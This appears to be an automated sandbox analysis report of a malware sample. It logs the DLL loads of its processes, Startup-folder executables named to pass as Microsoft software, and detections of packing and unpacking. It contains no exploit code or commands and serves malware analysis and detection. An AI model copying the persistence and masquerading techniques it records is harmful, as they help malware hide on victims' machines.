Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: LisectAVT_2403002B_366.exe

Static file information: File size 1214464 > 1048576

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Unpacked PE file: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.data:EW;du:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:ER;.data:ER;du:ER;
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Unpacked PE file: 1.2.RRqyIX.exe.ae0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\AppData\Local\Temp\server.exe	Unpacked PE file: 4.2.server.exe.9a0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.data:EW;du:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:ER;.data:ER;du:ER;
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Unpacked PE file: 15.2.RRqyIX.exe.a30000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Unpacked PE file: 21.2.Microsoft Corporation.exe.930000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.data:EW;du:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:ER;.data:ER;du:ER;
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Unpacked PE file: 22.2.RRqyIX.exe.510000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

Unpacked PE file: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack

Source: initial sample

Static PE information: section where entry point is pointing to: du

Source: LisectAVT_2403002B_366.exe	Static PE information: section name:
Source: LisectAVT_2403002B_366.exe	Static PE information: section name:
Source: LisectAVT_2403002B_366.exe	Static PE information: section name:
Source: LisectAVT_2403002B_366.exe	Static PE information: section name: du
Source: server.exe.0.dr	Static PE information: section name:
Source: server.exe.0.dr	Static PE information: section name:
Source: server.exe.0.dr	Static PE information: section name:
Source: server.exe.0.dr	Static PE information: section name: du
Source: RRqyIX.exe.0.dr	Static PE information: section name: .aspack
Source: RRqyIX.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.1.dr	Static PE information: section name: u
Source: Explower.exe.4.dr	Static PE information: section name:
Source: Explower.exe.4.dr	Static PE information: section name:
Source: Explower.exe.4.dr	Static PE information: section name:
Source: Explower.exe.4.dr	Static PE information: section name: du
Source: Microsoft Corporation.exe.4.dr	Static PE information: section name:
